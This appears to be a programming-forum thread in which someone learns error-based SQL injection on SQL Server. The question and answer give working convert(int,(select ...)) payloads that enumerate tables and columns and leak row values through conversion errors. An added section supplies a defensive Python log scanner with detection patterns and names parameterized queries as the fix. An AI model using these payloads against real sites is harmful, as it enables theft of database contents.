Learning SQL injection. I have found a SQL injection on my site.

I am able to execute the following queries and retrieve table names and column names:

Table names:

convert(int,(select top 1 table_name from information_schema.tables))

Column names:

convert(int,(select top 1 column_name from information_schema.columns where table_name='customer' and column_name not in('id')))



Table structure:

    id      nvarchar
    custid  nvarchar

Rows:

    id  custid
    --  ------
    1   1000
    2   1001

I have found the following structure of the table.

But now I am not able to get the values in the row.

Tried:

convert(int,(select top 1 id from customer))--

In this query, it doesn't show any error and I could not get the row value.

Thought:

Even though the "id" column type is "nvarchar", it stores integer values, so converting to int doesn't cause an error?

How do I get the values of a row in this case?

1 Answer

You could concatenate a non-numeric string, such as convert(int,(select top 1 'id:' + id from customer))--

And if you're looking for what's in an int field, cast it to varchar(10) and then concatenate with non-numeric string.

But don't use this for evil...

1 Comment

I tried concatenating but it does work.. yeah sure, I will not use it for evil purposes.
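From the defender's side, the conversion-error expressions in this thread leave a recognizable shape in request logs. The following is an added example, not part of the original question or answer: a small scanner that normalizes each query-string parameter and flags that shape. The rule names, the `scan_request` helper and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Rule names and patterns are constructed for this example.
RULES = {
    # A subquery forced through an integer conversion, so that a failed
    # conversion echoes the selected value in the database error text.
    "cast-subquery": re.compile(
        r"\b(?:convert\s*\(\s*int\s*,|cast\s*\()\s*\(\s*select\b"),
    # Enumeration of table or column names through the metadata views.
    "schema-enumeration": re.compile(
        r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
}

def normalize(value, max_rounds=3):
    """Undo nested URL-encoding, drop /* */ comments, collapse whitespace."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def scan_request(url):
    """Return (parameter, rule) pairs for every rule a parameter matches."""
    findings = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalize(raw)
        findings += [(name, rule) for rule, rx in RULES.items() if rx.search(value)]
    return findings

# Constructed request lines: two expressions from the question (the second
# one double URL-encoded) and one benign search.
SAMPLE_REQUESTS = [
    "/product.aspx?id=convert(int,(select%20top%201%20table_name"
    "%20from%20information_schema.tables))",
    "/product.aspx?id=CONVERT%2528int%252C%2520%2528SELECT%2520top%25201"
    "%2520id%2520from%2520customer%2529%2529",
    "/search?q=how+to+convert+int+to+string",
]

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(scan_request(url) or "clean", url[:60])
```

Log matching like this only reports attempts. The leak itself depends on the application building SQL from request input and returning the database error text to the client, so parameterized queries and generic error pages are what close it.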
